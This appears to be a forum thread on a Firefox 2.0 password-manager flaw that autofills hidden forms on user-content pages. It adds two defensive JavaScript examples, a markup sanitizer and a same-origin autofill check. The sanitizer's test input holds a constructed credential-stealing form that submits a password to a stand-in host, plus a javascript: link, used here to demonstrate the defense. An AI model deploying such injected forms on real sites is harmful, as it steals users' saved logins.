Firefox 2.0 Password Manager Bug Exposes Passwords
zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."
According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.
So much for me being smug about going back to Firefox 1.5!
A pizza of radius z and thickness a has a volume of pi z z a
It also took me a while to figure out how to remove the close button from each tab. The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix.
In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm, though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.
Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?
That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.
I tried it with both IE6 and IE7 and can confirm that on both of the computers I tried, the proof-of-concept page failed.
Pax Digitalia
> No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use). Firefox, for as long as I can remember, has allowed you to set a master password, without which the password manager will not populate any password fields and will not allow the viewing of any stored passwords.
Yes, but that's not a problem because they aren't on a domain where you have a saved password. The problem here is that random people can upload content to, say, myspace.com, and if you have a password for myspace.com, your browser will automatically fill their form in. When an attacker uploads something to attacker.example.com, you aren't going to care because you don't have a saved password for attacker.example.com.
Bogtha Bogtha Bogtha
DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5
If you have form autocomplete on, credit card numbers are stored in plaintext on your hard disk too. Bug's been open for... what, about 4 years now.
They refuse to fix it, they say it's not a bug.
I don't think it's vulnerable to this because it's not fully automatic, however, all someone has to do to get your credit card number is type the first digit and it'll fill in the rest.
Their advice, "Don't use autocomplete".
I've had enough abrasive sigs. Kittens are cute and fuzzy.
I for one only use the browser's store-password feature for the most trivial of sites. For more important sites, I use Password Safe. The program and the database fit easily on a thumb drive, and require a master password to access. It has a user-configurable timeout, and a double click on an account copies the data to the clipboard for later use, allowing you to foil keyboard-based sniffers.
IANAL... But I play one on
I have two types of passwords: The ones for fluff sites, like Slashdot, Wikipedia, hotmail (a.k.a. Spam box), and so forth, which usually get 1 of 2 passwords. Then for banks and credit cards and what have you, I use real passwords with different ones for each site.
I could care less if someone hacks my Slashdot account or my wikipedia account. The worst thing they can do is vandalize under my name. And as for hotmail, they can have my spam. And were I to have a myspace account, I could care less if someone got that too.
Fortunately, my bank and credit card companies don't allow others to create their own pages, so I'm not too concerned. I suspect this will get fixed long before it becomes a concern for me.
Take a look at http://kb.mozillazine.org/Permissions.default.image it explains how to set the Permissions.default.image to show only images from the originating site. Personally, I wish they would have left the check box for it in preferences, but editing in about:config is nearly as fast.
Please look at the bug report. Submission of testcase file is November 12 (9 days ago)
From TFA: The clock is ticking... will Firefox beat IE's response time?
Opera has indeed been around longer, and most of the ideas in FF, such as tabs, mouse gestures, and the wand, were done first in Opera.
It's why this vulnerability is so stupid, all the FF team had to do was copy the way Opera does it.
In order to use the password manager, you need to click on the wand, or hit ctrl & enter together.
The ctrl enter shortcut is a beautiful idea, because after recalling the password, it "clicks" the button that currently has focus, which is usually the "login" button, so most of the time it fetches the password and logs you in automatically after you hit that key combo.
Nice and simple, but nice and secure because there is no way to trick the user into doing it.
It has become appallingly obvious that our technology has exceeded our humanity. --Albert Einstein
It is not a bug with firefox, it is a bug with myspace.
I doubt you will find many places other than myspace where this "bug" will be exploited. Why? Because most sites that host user generated content are responsible enough to remove the user's ability to post potentially-malicious markup language on the site. These sites strip almost all (if not all) markup and only allow a small handful of decoration tags like BOLD. (Slashdot is a perfect example of allowed html markup)
The problem is that the code on myspace is shoddy at best, and the fact that users can put any kind of html on their myspace page was an accidental result of such. Then when users figured out they could customize their page with css and other markup code they were happy, and so myspace left it in.
Nowadays everyone is so used to myspace letting them customize their page (in a shitty hack sort of way) that if they were to take that aspect away I think myspace would die in a month (I know a lot of girls who only go on myspace so that they can upgrade their page and make it look better by customizing it) so they are not likely to ditch this "feature" of their site.
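The comment above argues that sites which strip user-supplied markup down to a handful of decoration tags are not exposed to this attack, because a visitor's browser never sees an attacker's `<form>` or `<input>` on their domain. The following is an added example of such an allowlist sanitizer, written for this page; it is not code from MySpace, Slashdot or Firefox. It assumes a simplified tag tokenizer (a production sanitizer should be built on a real HTML parser), and allows only `b`, `i`, `strong`, `em`, `p`, `br` and `a` with an `http(s)` `href`; everything else, form elements included, is escaped and rendered as literal text.

```javascript
// Added example (not any site's production code): allowlist sanitizer for
// user-generated markup. Any tag not on the allowlist is escaped to text, so a
// <form>/<input> pasted into a profile page can never become a real form that
// a password manager would fill.
const ALLOWED = {
  b: [], i: [], strong: [], em: [], p: [], br: [],
  a: ["href"], // the only attribute any allowed tag may keep
};

// Escape the characters that would let text be read as markup or attribute syntax.
function escapeText(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Keep only absolute http(s) links; javascript:, data: and relative values are dropped.
function safeHref(value) {
  try {
    const u = new URL(value);
    return (u.protocol === "http:" || u.protocol === "https:") ? u.href : null;
  } catch (e) {
    return null;
  }
}

function sanitize(html) {
  // Simplified tokenizer (an assumption of this example): tag name plus raw attribute text.
  const tagRe = /<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let out = "";
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index)); // text between tags
    last = tagRe.lastIndex;
    const closing = m[1] === "/";
    const name = m[2].toLowerCase();
    if (!(name in ALLOWED)) {
      out += escapeText(m[0]); // unknown tag becomes visible text, not markup
      continue;
    }
    if (closing) {
      out += `</${name}>`;
      continue;
    }
    let kept = "";
    let a;
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(m[3])) !== null) {
      const attrName = a[1].toLowerCase();
      const raw = a[2] !== undefined ? a[2] : (a[3] !== undefined ? a[3] : (a[4] || ""));
      if (!ALLOWED[name].includes(attrName)) continue; // drops onclick, style, action, ...
      const value = attrName === "href" ? safeHref(raw) : raw;
      if (value !== null) kept += ` ${attrName}="${escapeText(value)}"`;
    }
    out += `<${name}${kept}>`;
  }
  out += escapeText(html.slice(last));
  return out;
}

// Constructed sample of the kind of markup the report describes: a login-looking
// form placed inside user content, pointing at a host the site does not own.
const SAMPLE_PROFILE_MARKUP =
  '<b>About me</b> <form action="https://collector.invalid/grab">' +
  '<input name="user"><input name="pass" type="password"></form>' +
  '<a href="javascript:alert(1)" onclick="x()">link</a> 1 < 2';

console.log(sanitize(SAMPLE_PROFILE_MARKUP));
```

The point of the design is that the allowlist is tiny and the default action is to escape, so anything the authors did not think of (new elements, odd attribute syntax) degrades to inert text rather than to markup.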
> According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.
They say it exists in IE 6/7, so they don't look like the only fool.
So how do they explain the fact that it really 'doesn't exist' in IE 6/7, and doesn't this make them look even more foolish?
And no I won't defend IE6 or even IE7. But keep the facts where they are; this is not an IE exploit.
history | less ?
Get your own free personal location tracker
HTML forms work just fine without Javascript. And yes, you're effectively tricked into clicking an action button. If you look at the sample "injected HTML", they make it look like the user is clicking a Flash movie when in fact they're clicking a blank image-type <input> on the page. This submits the GET-style form. So long as the user is "tricked" into clicking something, and forms are allowed, this could steal the password from the password manager.
The code is available in the text box at the bottom of this page. Neither Flash nor Javascript is required to trigger the exploit, just a click from a user in an attacker-defined position on the page.
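The summary at the top and the two comments above describe the same mechanism: the password manager fills saved credentials into any form on the domain, including invisible fields, and a plain (non-script) form submission then carries them wherever the form's `action` points. The following is an added example of the defensive rule that closes that gap; it is written for this page and is not Firefox's own code. It assumes a stored-login record that remembers the origin of the page the login was saved on and the origin the original form submitted to (constructed names `pageOrigin` and `submitOrigin`), and refuses to fill when the current form would submit elsewhere.

```javascript
// Added example (not Firefox's code): a same-origin autofill policy. A saved
// credential is filled only when the form would submit to the origin it was
// saved against, so a form injected into a user-content page of the same site,
// pointing at the injector's own server, stays empty.

// Scheme + host + port: the unit the same-origin policy reasons about.
function originOf(url) {
  return new URL(url).origin;
}

// Resolve a form's action the way a browser does: relative actions resolve
// against the page URL, and a missing or empty action submits back to the page.
function resolveAction(action, pageUrl) {
  if (typeof action !== "string" || action.trim() === "") {
    return new URL(pageUrl).href;
  }
  return new URL(action, pageUrl).href;
}

// `saved` is the assumed stored-login shape: { pageOrigin, submitOrigin }.
// `form` is a plain object with an optional `action`, as a DOM form would expose.
function shouldAutofill(saved, form, pageUrl) {
  const pageOrigin = originOf(pageUrl);
  if (pageOrigin !== saved.pageOrigin) {
    return { fill: false, reason: "page origin differs from the saved origin" };
  }
  const actionOrigin = originOf(resolveAction(form.action, pageUrl));
  if (actionOrigin !== saved.submitOrigin) {
    return {
      fill: false,
      reason: `form submits to ${actionOrigin}, credential was saved for ${saved.submitOrigin}`,
    };
  }
  // Field visibility is deliberately not consulted: the report's point is that
  // hidden fields get filled too, so the decision must rest on where the data goes.
  return { fill: true, reason: "same-origin submission" };
}

// Constructed sample: a credential saved on the site's own login page.
const SAVED = { pageOrigin: "https://www.example.com", submitOrigin: "https://www.example.com" };

// Four situations a practitioner would want the policy to get right.
function demo() {
  return {
    // the site's real login form: fill
    legit: shouldAutofill(SAVED, { action: "/account/login" }, "https://www.example.com/login"),
    // a form on a user-content page submitting off-site: do not fill
    userPage: shouldAutofill(SAVED, { action: "https://collector.invalid/grab" },
                             "https://www.example.com/profile/someone"),
    // no action attribute: submits to the page itself, same origin: fill
    noAction: shouldAutofill(SAVED, {}, "https://www.example.com/login"),
    // same host over plain http: a different origin, do not fill
    httpPage: shouldAutofill(SAVED, { action: "/account/login" }, "http://www.example.com/login"),
  };
}

for (const [name, r] of Object.entries(demo())) {
  console.log(name, r.fill, "-", r.reason);
}
```

Note that the check compares origins of the resolved action, not hostnames alone, which is why the plain-http case is refused: a credential saved over https should not be handed to a form that would send it in the clear, even on the same host.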